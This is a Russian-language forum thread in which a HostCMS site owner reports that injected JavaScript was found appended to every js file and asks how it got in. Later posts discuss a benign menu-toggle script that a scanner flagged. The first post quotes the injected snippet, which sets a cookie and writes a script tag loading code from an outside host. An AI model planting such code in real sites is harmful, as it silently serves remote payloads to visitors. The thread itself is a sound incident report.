Заражение HostCms JavaScript-вирусом

#
Заражение HostCms JavaScript-вирусом
Есть сайт написанный на HostCMS v.5. Пароль сложный. Доступ к сайту имеют несколько менеджеров заказчика. FTP только у меня.
В один "прекрасный" момент Chrome заблокировал мне доступ к сайту мотивировав это вредоносным содержимым.

Я порылся в коде и нашел, что к каждому js-файлу добавлена строчка :
===
function g(){var r=new RegExp("(?:; )?1=([^;]*);?";return r.test(document.cookie)?true:false}var e=new Date();e.setTime(e.getTime()+(2592000000));
if(!g()&&window.navigator.cookieEnabled){document.cookie="1=1;expires="+e.toGMTString()+";path=/";document.write('<scr'+'ipt src="http://ratingsite.org/ratingsite.php"></scr'+'ipt>';}
===

Знает ли кто-нибудь, как эта фигня могла попасть на сайт? Через похищение пароля или есть все-же дыры в админке?
Первый раз такое вижу на HostCMS.
#
Re: Заражение HostCms JavaScript-вирусом
Спасибо за совет!
Модератор
#
Re: Заражение HostCms JavaScript-вирусом
Пожалуйста.
#
Re: Заражение HostCms JavaScript-вирусом
добрый день, я проверил несколько сайтов на одном из сервисов,который мне показал, что код, приведённый ниже является вредоносным.
<SCRIPT><!--
               
               function show_hide_menu(id)
               {
               if (obj = document.getElementById(id))
               {
               obj.style.display == 'none' ? obj.style.display = 'block' : obj.style.display = 'none';
               return false;
               }
               return true;
               }
               
            --></SCRIPT>
применяю "ctrl u" и вижу его прямо перед меню каталога, в макете сайта его нет... у меня вопрос, имеет ли этот скрипт отношение к хост цмс и, если нет, как его удалить?
#
Re: Заражение HostCms JavaScript-вирусом
Больше похоже на безобидный скрипт показывающий какой-то блок.
#
Re: Заражение HostCms JavaScript-вирусом
Yukimura,
почему он закомментирован и не виден в форме редактирования макета?
Модератор
#
Re: Заражение HostCms JavaScript-вирусом
bask писал(а):
имеет ли этот скрипт отношение к хост цмс и, если нет, как его удалить?

Имеет отношение. Это скрипт для показа выпадающего меню, как видно из названия функции. Шел стандартно с 5й версией системы. Что такого "вредоносного" в этом скрипте неизвестно.
Вы только что начали читать предложение, чтение которого вы уже заканчиваете.
#
Re: Заражение HostCms JavaScript-вирусом
alexander.egorov, спасибо
Авторизация